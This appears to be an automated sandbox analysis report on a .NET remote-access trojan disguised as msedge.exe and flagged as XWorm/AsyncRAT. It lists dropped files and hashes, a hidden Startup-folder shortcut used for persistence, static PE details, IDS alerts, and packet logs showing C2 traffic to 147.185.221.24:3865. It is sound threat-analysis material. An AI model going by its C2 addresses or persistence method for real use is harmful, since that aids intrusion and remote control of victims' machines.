Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="613970" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Users\user\AppData\Local\msedge.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\msedge.exe
File Type:	Generic INItialization configuration [WIN]
Category:	modified
Size (bytes):	58
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
MD5:	5362ACB758D5B0134C33D457FCC002D9
SHA1:	BC56DFFBE17C015DB6676CF56996E29DF426AB92
SHA-256:	13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
SHA-512:	3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r

C:\Users\user\AppData\Local\msedge.exe

Download File

Process:	C:\Users\user\Desktop\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150016
Entropy (8bit):	6.696125464038131
Encrypted:	false
SSDEEP:	3072:O4et7oUbY1cZx3bNLap5fOesrKe5BV0bUniyimyW:O4GkcHbAe5v0bURy
MD5:	F1C2525DA4F545E783535C2875962C13
SHA1:	92BF515741775FAC22690EFC0E400F6997EBA735
SHA-256:	9E6985FDB3BFA539F3D6D6FCA9AAF18356C28A00604C4F961562C34FA9F11D0F
SHA-512:	56308AC106CAA84798925661406A25047DF8D90E4B65B587B261010293587938FA922FBB2CFDEDFE71139E16BFCF38E54BB31CBCC00CD244DB15D756459B6133
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\msedge.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.f.................&..."......~D... ...`....@.. ....................................@.................................0D..K....`............................................................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`... ...(..............@..@.reloc...............H..............@..B................`D......H........`..4.......&.....................................................(.....r...p. ......(.....r...p. .d...s.........s.........s.........s..........r;..p. a.V..r...p. 2.d..ru..p. .....r...p. .x!..r...p. E/....((....r...p. S....r...p. .M^."(....+."(....+.&(....&+..+5s\... .... .'..o]...(,...~....-.(I...(?...~....o^...&.-..r...p.r...p.r...p. ..9..r...p.rW..p. .."..r...p. e/...r...p. .#...r...p. .<..*..............j..................s_..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Download File

Process:	C:\Users\user\Desktop\msedge.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 2 16:44:54 2024, mtime=Mon Dec 2 16:44:57 2024, atime=Mon Dec 2 16:44:57 2024, length=150016, window=hide
Category:	dropped
Size (bytes):	954
Entropy (8bit):	5.047582377057169
Encrypted:	false
SSDEEP:	12:8t9KO4c3WCygda8zKR4KiReirjAJf421IlpgUNwuLvqA44t2YZ/elFlSJmZmV:8t9ULbgNKRHi1AJf42CL7Pq/qyFm
MD5:	23B28B05CCE1C6B275C333E392DA5BD5
SHA1:	19FDEE658A57326026798D80AC1D6389B6604CFE
SHA-256:	A7FD9E65A9F35910EC90A24586CFB0DF7604BD2B5961D1063FC5DA7F276E12EB
SHA-512:	72A5E622E44AA6FBE51FF7BA5B86006604879A3E4D4DFF832159614A7BCA6073050B6A10FAF68A123C00AFCDF390338D876BEE02DF03F4015E0E77948F050E20
Malicious:	false
Preview:	L..................F.... .....t..D.._.E..D.._.E..D...J......................n.:..DG..Yr?.D..U..k0.&...&......vk.v....xb...D..`...D......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b.....................x#..L.o.c.a.l.....`.2..J...Y.. .msedge.exe..F......Y...Y.............................;=.m.s.e.d.g.e...e.x.e.......V...............-.......U.............J......C:\Users\user\AppData\Local\msedge.exe..".....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.m.s.e.d.g.e...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......549163...........hT..CrF.f4... .(.T..b...,.......hT..CrF.f4... .(.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465983964447968
Encrypted:	false
SSDEEP:	6144:pIXfpi67eLPU9skLmb0b4dWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:aXD94dWlLZMM6YFHq+9
MD5:	CA076E46157FDEE45DFCABC88ECAF5C7
SHA1:	D87413715638511FC722CAF03552AA5B71666D97
SHA-256:	6835CB5C142F89AC21E5217573F32109434E507DD7E7ADD14D28DD14E7D6E048
SHA-512:	76248AAB838D24D6279D4E98CE505B6FADB31C3E96592AA0FE21A3710D024DA71A4B99017A7248F3AFF10AB7824ECF18B6A03D1228E283F4E66AD1E253F70217
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~.#U.D..............................................................................................................................................................................................................................................................................................................................................:.4a........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.696125464038131
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	msedge.exe
File size:	150'016 bytes
MD5:	f1c2525da4f545e783535c2875962c13
SHA1:	92bf515741775fac22690efc0e400f6997eba735
SHA256:	9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
SHA512:	56308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133
SSDEEP:	3072:O4et7oUbY1cZx3bNLap5fOesrKe5BV0bUniyimyW:O4GkcHbAe5v0bURy
TLSH:	6AE3CF047BE5595AE86DCBF09CB1B7974739EE562412C26E30E06EBE7B43988C800FD5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.f.................&..."......~D... ...`....@.. ....................................@................................

File Icon


Icon Hash:	0703053232670f1f

Static PE Info

General

Entrypoint:	0x41447e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66D6551D [Tue Sep 3 00:15:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14430	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x11fd2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x28000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x12484	0x12600	93a0924952f5ff6f1718369ab1476828	False	0.6178385416666666	data	6.148458314188822	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x11fd2	0x12000	7fd3e3fc11413536243aadd076347030	False	0.6408827039930556	data	6.763224846854993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x28000	0xc	0x200	549acdf2b41238c7228afe03770ae4a1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x16280	0x6fd1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9973449781659388
RT_ICON	0x1d254	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.36620217288615964
RT_ICON	0x2147c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.4182572614107884
RT_ICON	0x23a24	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720	0.4485207100591716
RT_ICON	0x2548c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.5117260787992496
RT_ICON	0x26534	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.5745901639344262
RT_ICON	0x26ebc	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	0.6540697674418605
RT_ICON	0x27574	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.7145390070921985
RT_GROUP_ICON	0x279dc	0x76	data	0.7288135593220338
RT_VERSION	0x27a54	0x394	OpenPGP Secret Key	0.39956331877729256
RT_MANIFEST	0x27de8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T18:45:20.645531+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49732	147.185.221.24	3865	TCP
2024-12-02T18:46:30.372526+0100	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49822	147.185.221.24	3865	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 18:45:00.316950083 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:00.316992998 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:00.317068100 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:00.467456102 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:00.467483044 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:01.792633057 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:01.792778969 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:01.814802885 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:01.814825058 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:01.815896034 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:01.860631943 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:01.963830948 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:02.007343054 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:02.915611029 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:02.915904045 CET	443	49730	104.20.3.235	192.168.2.4
Dec 2, 2024 18:45:02.916042089 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:02.932881117 CET	49730	443	192.168.2.4	104.20.3.235
Dec 2, 2024 18:45:03.217261076 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:03.217303991 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:03.217880964 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:03.218748093 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:03.218765020 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:04.910263062 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:04.910492897 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:04.913418055 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:04.913439989 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:04.913855076 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:04.915494919 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:04.959336042 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:05.428978920 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:05.429083109 CET	443	49731	149.154.167.220	192.168.2.4
Dec 2, 2024 18:45:05.429147959 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:05.436191082 CET	49731	443	192.168.2.4	149.154.167.220
Dec 2, 2024 18:45:09.490264893 CET	49732	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:09.610330105 CET	3865	49732	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:09.610419035 CET	49732	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:09.650651932 CET	49732	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:09.773829937 CET	3865	49732	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:11.080653906 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:11.080692053 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:11.080874920 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:11.081321955 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:11.081332922 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:13.456005096 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:13.456094027 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:13.457922935 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:13.457928896 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:13.458257914 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:13.460640907 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:13.507328987 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:14.033963919 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:14.034027100 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:14.034084082 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:14.036556959 CET	49733	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:14.036565065 CET	443	49733	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:14.038105965 CET	49736	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:14.038141966 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:14.038223982 CET	49736	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:14.038450956 CET	49736	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:14.038466930 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:15.474736929 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:15.477279902 CET	49736	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:15.477303982 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:16.305430889 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:16.305577993 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:16.305679083 CET	49736	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:16.305942059 CET	49736	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:16.305960894 CET	443	49736	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:18.315222025 CET	49740	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:18.315279007 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:18.315413952 CET	49740	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:18.315687895 CET	49740	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:18.315699100 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:19.738905907 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:19.781171083 CET	49740	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:19.781199932 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:20.264764071 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:20.264924049 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:20.265012980 CET	49740	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:20.265269995 CET	49740	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:20.265289068 CET	443	49740	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:20.265760899 CET	49742	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:20.265785933 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:20.265855074 CET	49742	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:20.266069889 CET	49742	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:20.266082048 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:20.645530939 CET	49732	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:20.769293070 CET	3865	49732	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:22.831708908 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:22.840675116 CET	49742	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:22.840708971 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:23.355144978 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:23.355285883 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:23.355654001 CET	49742	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:23.355670929 CET	443	49742	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:23.355680943 CET	49742	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:25.411295891 CET	49743	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:25.411345959 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:25.411427975 CET	49743	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:25.412480116 CET	49743	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:25.412489891 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:26.831738949 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:26.833441019 CET	49743	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:26.833460093 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:27.358285904 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:27.358366966 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:27.358454943 CET	49743	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:27.358969927 CET	49743	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:27.358988047 CET	443	49743	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:27.359597921 CET	49744	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:27.359641075 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:27.359718084 CET	49744	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:27.359957933 CET	49744	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:27.359967947 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:29.078978062 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:29.080636024 CET	49744	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:29.080658913 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:29.610606909 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:29.610657930 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:29.610727072 CET	49744	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:29.611485958 CET	49744	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:29.611500978 CET	443	49744	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:31.570941925 CET	3865	49732	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:31.571106911 CET	49732	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:31.627037048 CET	49745	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:31.627083063 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:31.627212048 CET	49745	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:31.627588987 CET	49745	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:31.627604961 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:32.985945940 CET	49732	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:32.987440109 CET	49746	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:33.106651068 CET	3865	49732	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:33.107785940 CET	3865	49746	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:33.107872963 CET	49746	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:33.119498014 CET	49746	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:33.121642113 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:33.122823000 CET	49745	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:33.122862101 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:33.241276979 CET	3865	49746	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:33.656625986 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:33.656677961 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:33.656740904 CET	49745	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:33.657282114 CET	49745	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:33.657299995 CET	443	49745	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:33.658682108 CET	49747	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:33.658698082 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:33.658759117 CET	49747	443	192.168.2.4	91.134.9.160
